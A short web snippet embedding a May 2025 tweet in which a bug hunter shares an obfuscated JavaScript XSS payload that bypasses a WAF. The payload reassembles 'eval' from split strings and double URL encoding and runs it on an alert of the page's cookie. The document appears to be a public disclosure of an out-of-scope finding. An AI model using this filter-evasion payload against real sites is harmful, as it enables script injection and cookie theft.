The tweet mentions an XSS vulnerability along with a WAF bypass using a JavaScript payload. The payload obfuscates the alert() function to evade detection. Although the XSS vulnerability is out of scope, the bypass technique is noteworthy. More details can be found at https://t.co/CAVWW6Q75e
Found XSS + WAF bypass, but just realize XSS is out of scope LOL
so ill drop it herejavascript:top['e'+''+decodeURIComponent('%2576')+'a'+'l'](decodeURIComponent('%2561')+decodeURIComponent('%256c')+'ert'+'(docume'+'https://t.co/CAVWW6Q75e'+'okie)');//
— 0xdead4f (@0xdead4f) May 5, 2025